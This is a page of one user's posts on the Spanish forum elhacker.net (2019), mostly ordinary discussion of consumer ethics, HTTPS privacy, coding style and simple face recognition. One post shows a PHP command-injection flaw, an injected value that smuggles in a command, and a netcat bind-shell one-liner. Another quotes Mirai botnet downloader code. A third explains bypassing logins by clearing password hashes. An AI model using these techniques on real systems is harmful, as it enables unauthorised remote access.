elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 31
41  Foros Generales / Foro Libre / Re: La ONU plantea cambiar la dieta para frenar el calentamiento global en: 9 Agosto 2019, 12:50 pm
Bueno, a mi modo de ver, el consumidor aparte de consumir puede variar el producto que va a consumir. Y si se movilizase el consumo hacia productos que sean éticos, los que producen productos que no lo son, no podrían darles salida y no sobrevivirían.
Así que como parte del sistema, al no cambiar los hábitos de consumo somos parte del problema.
Cada vez que haces una acción de comprar o meter el dinero en algo, lo estás subvencionando e incentivando a que el modo de proceder de la empresa o la cadena de empresas que lo producen sigan haciéndolo.  Así que, creo que si que somos responsables de lo que pasa como consumidor.
En muchas ocasiones, cuando se hace una compra de ropa barata por ejemplo, es barata porque se ha utilizado mano de obra esclava en mayor o menor medida. Igual tocaría ir a un comercio justo a comprarla, siendo el coste bastante mayor, en lugar de comprarla en la cadena que sea. Parece que tal y como se ha hecho el proceso de globalización de muchas empresas, la internacionalización para muchas es simplemente una manera que suene bien de decir, "utilizamos mano de obra esclava en otros paises donde las normativas de empleo son inexistentes".
Probablemente, si se hiciese de forma masiva un movimiento social que consiga gesticular el consumo, se podría cambiar prácticamente lo que se desease de este mundo.
42  Programación / Desarrollo Web / Re: Cifrar texto a Base64 en javascript en: 8 Agosto 2019, 09:21 am
Entiendo que es por realizar el ejercicio de implementarlo y por dejarlo como guía o manual de como hacer la codificación.
Enhorabuena por el código, este tipo de cosas las deberíamos de hacer todos, aunque después igual utilicemos librerías. Pero para entender bien como funcionan los algoritmos creo que es la manera más efectiva. Y eso es algo que a la gente se le suele olvidar o suele pasar de ello.
43  Foros Generales / Foro Libre / Re: Grupo hacktivista en: 7 Agosto 2019, 14:02 pm
Me refiero a comentar la situacion actual de internet y aportar soluciones para reivindicar nuestros derechos.
El hacktivismo se trata de reivindicaciones politicas a traves de metodos digitales. Por eso parece correcto utilizar este hilo para que la gente se conciencie de la vergonzosa situacion de la privacidad en intener y empezar a actuar. ::)

Todo como un poco genérico. ¿Que problema concreto deseas corregir por medio de hacktivismo? ¿Por que crees que se utilizar la via hacktivista es la via correcta para solucionarlo?
Porque, a modo de ejemplo, podría ser que para unos sea el gran problema la inmigración y para otros la xenofobia y hacktivistas todos ellos. Y terminan tostandose unos con otros.
El problema de la situacion actual de Internet puede no ser el mismo para alguien de la SGAE que para alguien de seriesYonkis. No se si me explico, entonces, ¿Hacktivismo defendiendo que idea? ¿Con que objetivo concreto?
44  Seguridad Informática / Seguridad / Re: ¿Puede mi ISP conocer mis busquedas en google usando HTTPS? en: 6 Agosto 2019, 13:24 pm
Normálmente no hace falta nada de DNS para saber a que dominio se esta conectando alguien usando https. En los primeros paquetes suele ir información en plano del certificado que te ayuda a saber si estas conectando, por ejemplo, con youtube, google o microsoft. Digo por sencillez. Y por supuesto, todo operador sabe con que servidor físico te conectas, porque eso es de capa IP. Igual que el cliente que esta pidiendo que tambien está en dicha capa.
No obstante en el DNS solo va el nombre del dominio, no va ningun dato de la búsqueda.
Lo de saber la búsqueda de google, lo que tecleas dentro de un formulario, y siempre que no haya error tuyo, no es posible. Eso son datos y van cifrados.
Lo de identificacion basándose en pixeles o movimiento de raton no se a que viene en este contexto.

PD: Por si acaso aclaro un poco más, todo esto hablamos de captación masiva e ISPs normales, alguien con suficiente poder te meten un certificado firmado por un CA oficial y te joden sin amor. MITM y probablemente te lo comerás con patatas por que el CA que lo firma es válido. Pero esto a priori, solo deberían tener mano gobiernos o cosas así.
45  Sistemas Operativos / Windows / Re: Laptop vieja en: 5 Agosto 2019, 12:33 pm
Siempre que no este cifrado.

Si deseas recuperar datos. Puedes arrancar desde un sistema live o bien le sacas el disco duro y lo conectas a otro ordenador como esclavo para sacar el contenido a otro disco duro. Después formateo y reinstalación y ya.

Si quieres poder hacer login en ella, desde otro sistema cámbiale las contraseñas y ya está. Por ejemplo si es un linux borras los hashes del "/etc/shadow" y así haces login sin password. Si es un windows haces lo equivalente pero con el archivo de passwords de ese sistema. En el caso de windows habia una herramienta live que automatizaba el cambio de passwords de forma muy sencilla, no recuerdo el nombre. Desde linux creo que hay una utilidad llamada chntpw que permite hacerlo.

Si el disco duro está cifrado, a intentar acordarte de la password.

PD: He dado por hecho que no se referia a la password de la BIOS.
46  Programación / Programación General / Re: ¿Es mejor o peor ser "purista" del codigo? en: 5 Agosto 2019, 11:24 am
Todo lo que va en la dirección de que no entiendas que esta pasando en la ejecución es un problema. Se hacen ahora modelos de 20000 capas en los que ni el programador sabe que esta pasando realmente, ni como se están comunicando y ni siquiera se comprende el flujo de datos pero sale software como churros. Eso si es un problema y gordo. Después en cada una de esas intersecciones se puede meter la palanca y vienen los lloros.

El hacer las cosas entendiendo lo que se hace obliga normalmente a que la producción de software se vuelva más costosa, y eso en la actual producción empresarial no se entiende porque se consigue vender mucha basura y se aprietan los costos a más no poder. Pero no quiere decir que este bien hecho. Cada día resulta que vienen noticias de mil sistemas que se tumban y mil filtraciones debido a que se pone gente a producir mediante tecnologías que no llegan a entender y venden productos que ni saben que tienen fallos.

Si utilizas una tecnología mas te vale comprenderla y si no, no deberías utilizarla ya que supone no saber que se está haciendo. El modelo de funcional estará sensacional, pero veras que risas cuando el sistema de tu banco tenga un sistema funcional magnífico con muchas mierdas móviles muy bonitas pero que no entienda ni el tato como fluyen los datos por él. Al final como nadie se responsabiliza, es siempre el usuario el que sale perjudicado.

Resumiendo, mi punto de vista es que se deben utilizar las tecnologías que quieras, el número de capas que desees y los elementos que necesites. Pero que se tiene que entender bien que está pasando en tu sistema, si no va a ser un problema.
47  Seguridad Informática / Hacking / Re: crear mi propio payload sin utilizar metasploit en linux? en: 18 Julio 2019, 12:27 pm
bueno para crear payloads para windows o android  pero de forma de que no emplee el uso de metasploit framework

Un payload es la ejecución de cualquier cosa. Puedes desde querer ejecutar la calculadora hasta ejecutar un sistema de control remoto.

Dependiendo de en donde ,exploit, vas a ejecutar dicho exploit tienes determinadas restricciones. El payload puede ser en algunos casos ejecución de determinados comandos, o una funcion compilada en binario para ejecutar en un buffer.

Por ejemplo, en un php que tenga en algun parte del código algo como esto:

Código:
system("convert ".$GET['nombrefichero']." ".random().".jpg");

Se podría meter en la variable GET nombre de fichero el valor:

Código:
"abc abc.jpg; PAYLOAD; convert abc "

onde PAYLOAD puede ser cualquier comando, en un entorno linux con nc por ejemplo si payload vale esto:

Código:
mkfifo /tmp/dummy; nc -l -p 4000 < /tmp/dummy | /bin/bash > /tmp/dummy; 

consigues una ejecucion de un entorno de comandos remoto en el servidor cuando te conectas al puerto 4000.

Pero por ejemplo ese payload concreto no se puede utilizar en un entonrno con un servidor con buffer overflow que permite ejecucion de comandos en pila, poque necesitas la generación de un payload que esté codificado en binario en forma de funcion para que cuando cambies la direccion de salto, saltes al payload y se ejecute la funcion que deseas. Que podría ser perfectamente un execvp de lo que he descrito arriba, pero necesitas envolverlo de más cosas para que séa funcional.

¿Se entiende? Por lo que ¿A que te refieres con hacer tu propio Payload? Porque los payloads al finál se pueden codificar en bash, visualbasic, python, SQL, codigo ensamblador.... dependiendo a que exploit van asociados.
48  Seguridad Informática / Análisis y Diseño de Malware / Re: Partes de la Botnet Mirai en: 18 Julio 2019, 12:09 pm
En lo que respecta al dlr en su main tienes esto:

Código:
#define HTTP_SERVER utils_inet_addr(127,0,0,1) // CHANGE TO YOUR HTTP SERVER IP

Esto se conecta al servidor http que tu pongas como pone en esa linea.
y hace peticiones GET a dicho server:

Código:
if (write(sfd, "GET /bins/mirai." BOT_ARCH " HTTP/1.0\r\n\r\n", 16 + arch_strlen + 13) != (16 + arch_strlen + 13))

Y se baja el contenido guardandolo en un archivo.
49  Seguridad Informática / Hacking / Re: crear mi propio payload sin utilizar metasploit en linux? en: 13 Julio 2019, 23:41 pm
Para que exploit, sistema y arquitectura? Es un re en un sistema web con PHP??
50  Programación / Programación General / Re: Necesito ayuda para programacion de reconocimiento facil en: 9 Julio 2019, 10:46 am
Plantéas varios problemas que no se si están del todo pensados, voy con una posible solución sencilla a la parte del reconocimiento facial. Probabablemente el algoritmo de reconocimiento facial más sencillo es el basado en matrices de máximos y minimos. Lo que tienes que hacer es hacerte un array con los pixeles de cada persona que deseas reconocer. Tomas un set de fotos y hallas los máximos de cada pixel y los minimos de cada pixel. Te quedarán dos imágenes de dos caras un tanto raras pero que describe el máximo y el minimo del set de fotos del que dispones de cada cara.
Despues para reconocer, simplemente lo que tienes que hacer es hallar el error de cada pixel de la foto nueva que has tomado respecto al máximo y el minimo. Si pixmaximo y pixminimo es el valor de un pixel de la foto cuando miras el valor de dicho pixel pix en la foto nueva el error será la distancia pix-pixmaximo en caso de que pix > pixmaximo y pixminimo-pix en caso de que pix < pixminimo. En otro caso el error será 0.
Sumas el error que te devuelve de la comparación de cada pixel y ese es el error de tu nueva cara respecto a las que tenías. El método más sencillo distingue entre caras de un set específico, tienes nu numero de caras especifico y hallas el error para todas, la cara nueva será la que tenga error mínimo. Puedes hacer un método más general haciendo un umbral el cual si se sobrepasa no es ninguna cara de tu set.

caras de ejemplo para proceso para que puedas hacer pruebas:
www.cl.cam.ac.uk/Research/DTG/attarchive/pub/data/att_faces.zip

PD: si no se entiende algo o quieres que lo amplíe me dices.
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 ... 31
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines